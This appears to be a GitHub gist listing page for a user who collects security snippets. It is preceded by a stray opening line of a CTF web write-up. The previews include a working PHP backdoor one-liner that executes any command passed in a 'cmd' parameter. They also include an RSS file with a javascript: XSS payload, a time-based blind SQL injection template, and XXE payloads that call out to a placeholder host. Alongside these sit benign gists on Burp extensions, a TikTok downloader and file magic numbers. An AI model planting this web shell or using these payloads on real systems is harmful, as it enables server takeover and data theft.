Category: Web Difficulty: Easy
We were offered a website that generates a pdf from a given URL.
- Enter a URL and submit
ryujinx serundengsapi
serundengsapi
/ insomni-hack-2019-03-22-web-ezgen-writeup.md
Created
August 4, 2025 02:59
— forked from ast3ro/insomni-hack-2019-03-22-web-ezgen-writeup.md
insomni-hack-2019-03-22-web-ezgen-writeup.md
serundengsapi
/ Simple-Backdoor-One-Liner.php
Created
July 2, 2025 09:48
— forked from samdenty/Simple-Backdoor-One-Liner.php
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Simple PHP Backdoor By DK (One-Liner Version) --> | |
| <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> | |
| <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |
serundengsapi
/ gist:81ff02e9e8a1ee9175cf3c86eb27f31d
Created
July 1, 2025 06:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8" ?> | |
| <rss version="2.0"> | |
| <channel> | |
| <title>toto</title> | |
| <description>This is a simplified example of the RSS feed</description> | |
| <link>java | |
| script:alert(`XSSSS!`)</link> | |
| <copyright>2021 fileformat.com All rights reserved</copyright> | |
| <lastBuildDate>Wed, 22 Jun 2021 00:01:00 +0000</lastBuildDate> | |
| <pubDate>Wed, 22 Jun 2021 16:20:00 +0000</pubDate> |
serundengsapi
/ dynamic_hmac_signature.py
Created
June 30, 2025 03:27
— forked from abdilahrf/dynamic_hmac_signature.py
Burpsuite extender for dynamically generate signature
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IBurpExtender | |
| from burp import IHttpListener | |
| from burp import IProxyListener | |
| from burp import IScannerListener | |
| from burp import IExtensionStateListener | |
| from java.io import PrintWriter | |
| from burp import IParameter | |
| import datetime | |
| import hashlib |
serundengsapi
/ blind_sqlinjection.py
Created
June 30, 2025 03:27
— forked from abdilahrf/blind_sqlinjection.py
Blind SQL injection Template
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import time | |
| session = requests.session() | |
| payload="(SELECT+IF(ascii(substring({kolom},{idx},1))<={guess},1,sleep(.5)))" | |
| cookies = {"XSRF-TOKEN": ""} | |
| headers = {"User-Agent": ""} | |
| data = {"_method": "delete"} |
serundengsapi
/ XXE_payloads
Created
June 30, 2025 03:27
— forked from abdilahrf/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
serundengsapi
/ Tiktok Downloader
Created
June 11, 2025 08:02
— forked from zakirkun/Tiktok Downloader
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "name": "Tiktok Downloader", | |
| "nodes": [ | |
| { | |
| "parameters": { | |
| "httpMethod": "POST", | |
| "path": "bot/hook", | |
| "options": {} | |
| }, | |
| "type": "n8n-nodes-base.webhook", |
serundengsapi
/ file_magic_numbers.md
Created
March 17, 2025 19:36
— forked from leommoore/file_magic_numbers.md
File Magic Numbers
Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.
For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.
This gives an ongoing list of file-type magic numbers.
serundengsapi
/ gist:b09604801e31451405b3b7188ce8013a
Created
July 9, 2024 15:06
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 13598270 |
serundengsapi
/ CVE-2024-28397.md
Created
June 23, 2024 02:37
— forked from win3zz/CVE-2024-28397.md
CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.
NewerOlder